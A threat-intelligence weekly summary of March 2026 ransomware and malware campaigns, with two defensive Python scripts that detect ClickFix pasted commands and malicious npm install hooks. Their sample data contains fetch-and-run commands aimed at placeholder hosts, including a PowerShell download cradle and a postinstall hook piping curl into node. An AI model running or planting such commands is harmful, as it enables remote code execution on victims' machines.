
Tags: Threat intelligence
20 March 2026

Weekly Cyberattack Summary – 12 to 18 March

LeakNet Ransomware Uses ClickFix, Deno Runtime in Stealthy Attacks  

Cybersecurity researchers have reported that the ransomware operator LeakNet is expanding its capabilities with new initial access and execution techniques, notably ClickFix lures (fake error or verification prompts that instruct the visitor to paste and run a command themselves) served from compromised legitimate websites, and a previously unreported in-memory loader built on the Deno JavaScript/TypeScript runtime. This marks a strategic shift away from reliance on initial access brokers (IABs) toward self-directed intrusion campaigns, letting the group scale operations and broaden its victim pool through opportunistic delivery. 
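ClickFix only works because the victim types or pastes the command into the Win+R Run box or a shell, so the execution chain starts from explorer.exe and lands in a script interpreter with a remote URL on the command line; a Deno-based stage adds `deno run` pointed at a remote module. The following detection sketch is an added example written for this summary, not code from the report or from any vendor product. The events are constructed to look like Sysmon Event ID 1 fields, the interpreter list and the regular expressions are assumed heuristics, and the `example.invalid` hosts are placeholders.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation)
# fields. They are illustrative only and are not taken from the LeakNet report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://cdn.example.invalid/v.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\alice\.deno\bin\deno.exe",
     "CommandLine": "deno run -A https://cdn.example.invalid/loader.ts"},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c npm test"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Interpreters and fetch tools a pasted ClickFix command typically lands in
# (assumed list; extend it for your environment).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "deno.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
CRADLE_RE = re.compile(r"\b(irm|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString|"
                       r"iex|Invoke-Expression|FromBase64String)\b", re.IGNORECASE)
DENO_REMOTE_RE = re.compile(r"\bdeno\b.*\brun\b.*https?://", re.IGNORECASE)
DENO_PERMS_RE = re.compile(r"(^|\s)(-A|--allow-all|--allow-net|--allow-run)\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def clickfix_reasons(event: dict) -> list[str]:
    """Return the heuristic indicators that fire for one process-creation event."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmd = event["CommandLine"]
    # A command pasted into the Win+R Run box is launched by explorer.exe; that
    # alone is normal, so it only counts together with other indicators.
    if parent != "explorer.exe" or child not in INTERPRETERS:
        return []
    reasons = [f"explorer.exe spawned {child}"]
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    if CRADLE_RE.search(cmd):
        reasons.append("PowerShell download/execute cradle")
    if child == "deno.exe" and DENO_REMOTE_RE.search(cmd):
        reasons.append("deno run of a remote module")
    if child == "deno.exe" and DENO_PERMS_RE.search(cmd):
        reasons.append("deno launched with broad permissions")
    return reasons


def find_clickfix_candidates(events: list[dict], min_reasons: int = 2) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips at least min_reasons indicators."""
    hits = []
    for i, event in enumerate(events):
        reasons = clickfix_reasons(event)
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
        for reason in why:
            print(f"  - {reason}")
```

Requiring two indicators keeps an analyst opening cmd.exe from the Start menu out of the results while still catching the pasted one-liner and the Deno stage; the same logic ports to a SIEM query once the field names are mapped. Pair it with a periodic read of each user's RunMRU registry key, which records what was typed into the Run box, to recover the original lure command after the fact.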

New Malware Highlights Increased Systematic Targeting of Network Infrastructure  

Researchers identified new malware samples highlighting a growing and systematic trend of threat actors targeting network infrastructure as an initial access and persistence vector. The findings confirm that this activity is no longer limited to nation-state APT groups, but is increasingly leveraged by financially motivated actors, including cryptomining operations. Two previously undocumented malware variants were observed: a new CondiBot DDoS botnet variant, derived from the Mirai ecosystem, and Monaco, a multi-architecture SSH scanner and cryptominer. 

Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks  

Cybersecurity researchers reported that the financially motivated threat cluster Hive0163 deployed a likely AI-generated malware framework named “Slopoly” during a ransomware intrusion in early 2026. The activity demonstrates early but notable adoption of artificial intelligence by cybercriminal groups to accelerate malware development and maintain persistent access in victim environments. Hive0163 is known for conducting large-scale ransomware operations and data exfiltration campaigns, frequently deploying Interlock ransomware alongside several private crypters and backdoors including NodeSnake, InterlockRAT, and the JunkFiction loader. 

Storm-2561 Uses SEO Poisoning to Distribute Fake VPN Clients for Credential Theft  

Microsoft Threat Intelligence reported that the financially motivated cybercriminal group Storm-2561 is conducting a credential-theft campaign that distributes fake VPN clients through SEO poisoning to redirect users searching for legitimate enterprise VPN software to attacker-controlled websites and malicious downloads. Active since at least May 2025, the campaign manipulates search engine results for queries such as “Pulse VPN download” or “Pulse Secure client,” leading victims to spoofed websites designed to mimic trusted VPN vendors. 

Contagious Interview: Malware Delivered Through Fake Developer Job Interviews  

The Microsoft Defender Security Research Team reported ongoing activity linked to the “Contagious Interview” campaign, a sophisticated social-engineering operation that has been active since at least December 2022 and continues to target software developers at enterprise solution providers and media and communications companies. The attackers exploit trust in recruitment workflows by posing as recruiters from cryptocurrency trading firms or AI-based solution providers and running realistic job interview processes that include outreach, technical discussions, and coding assignments. During these staged interviews, victims are instructed to clone and run malicious NPM projects hosted in repositories on platforms such as GitHub, GitLab, and Bitbucket, which deliver malware under the guise of a legitimate technical evaluation task.
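The cheapest place for a fake assignment repo to hide its payload is an npm lifecycle script, because `npm install` runs `preinstall`, `install`, `postinstall` and `prepare` without the developer ever invoking them. The audit below is an added example for this summary, not tooling from Microsoft or from the campaign report: it walks a cloned tree, reads each `package.json`, and reports hooks that run automatically together with assumed heuristics for hooks that fetch, decode or spawn something. The manifest it ships with is constructed to resemble such an assignment and the `example.invalid` host is a placeholder.

```python
import json
import re
import tempfile
from pathlib import Path

# npm runs these scripts on its own during `npm install`; the developer never
# calls them by name.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristics for a hook that does more than build the package.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"https?://", re.IGNORECASE), "reaches out to a remote URL"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.IGNORECASE), "uses a download tool"),
    (re.compile(r"\bnode\s+-e\b"), "runs inline JavaScript with node -e"),
    (re.compile(r"\beval\s*\("), "calls eval"),
    (re.compile(r"base64", re.IGNORECASE), "handles base64-encoded content"),
    (re.compile(r"child_process"), "spawns a subprocess from JavaScript"),
]

# Constructed manifest resembling what a fake "coding assignment" repo might
# carry; not a real sample from the campaign.
SAMPLE_MANIFEST = {
    "name": "trading-dashboard-assessment",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec('curl -s https://api.example.invalid/u | node')\"",
        "test": "jest",
    },
    "dependencies": {"express": "^4.18.0"},
}


def audit_manifest(manifest: dict) -> list[str]:
    """Findings for one parsed package.json: every auto-run hook plus why it looks off."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        findings.append(f"{hook} hook runs automatically on install: {cmd}")
        for pattern, why in SUSPICIOUS_PATTERNS:
            if pattern.search(cmd):
                findings.append(f"  {hook}: {why}")
    return findings


def audit_tree(root: Path) -> dict[str, list[str]]:
    """Audit every package.json under root, skipping already-installed dependencies."""
    results = {}
    for manifest_path in sorted(root.rglob("package.json")):
        if "node_modules" in manifest_path.parts:
            continue
        rel = manifest_path.relative_to(root).as_posix()
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError) as exc:
            results[rel] = [f"unreadable manifest: {exc}"]
            continue
        findings = audit_manifest(manifest)
        if findings:
            results[rel] = findings
    return results


def write_demo_tree() -> Path:
    """Create a throwaway clone layout containing the constructed manifest."""
    root = Path(tempfile.mkdtemp(prefix="npm-audit-"))
    (root / "assessment").mkdir()
    (root / "assessment" / "package.json").write_text(json.dumps(SAMPLE_MANIFEST), encoding="utf-8")
    vendored = root / "assessment" / "node_modules" / "lodash"
    vendored.mkdir(parents=True)
    (vendored / "package.json").write_text(
        '{"name": "lodash", "scripts": {"postinstall": "echo skip"}}', encoding="utf-8")
    return root


if __name__ == "__main__":
    for path, findings in audit_tree(write_demo_tree()).items():
        print(path)
        for line in findings:
            print("  " + line)
```

Run it on the clone before the first `npm install`, or install with `npm install --ignore-scripts` and read the hooks by hand. The script audit is only one check: the campaign relies on the candidate also running the assignment itself (`npm start`, `npm test`), so review the entry points named in `main` and `scripts` and run unknown interview projects in a disposable VM or container rather than on the workstation that holds your credentials and signing keys.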